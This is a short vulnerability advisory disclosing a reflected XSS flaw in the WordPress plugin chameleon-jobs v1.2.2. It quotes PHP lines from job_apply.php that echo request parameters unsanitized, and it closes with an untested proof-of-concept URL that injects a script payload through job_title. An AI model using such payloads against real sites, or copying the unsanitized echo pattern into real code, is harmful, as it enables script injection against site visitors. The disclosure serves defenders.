Advisory #: 874
Title: Reflected XSS in wordpress plugin chameleon-jobs v1.2.2
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/chameleon-jobs
Downloads: 247
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: chameleon-jobs
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./chameleon-jobs/job_apply.php: 365: <h3>Apply for position: <?php echo $_REQUEST['job_title']; ?></h3> 367: <input type="hidden" class="required" id="job_id" name="job_id" value="<?php echo $_REQUEST['jobid']; ?>"> 368: <input type="hidden" class="required" value="<?php echo $_REQUEST['job_title']; ?>" id="job_title" name="job_title"> The variable job_title appears to send unsanitized data back to the users browser.
CVE-ID: Not Released
File:./chameleon-jobs/job_apply.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/chameleon-jobs/job_apply.php?job_title="><script>alert(1);</script><"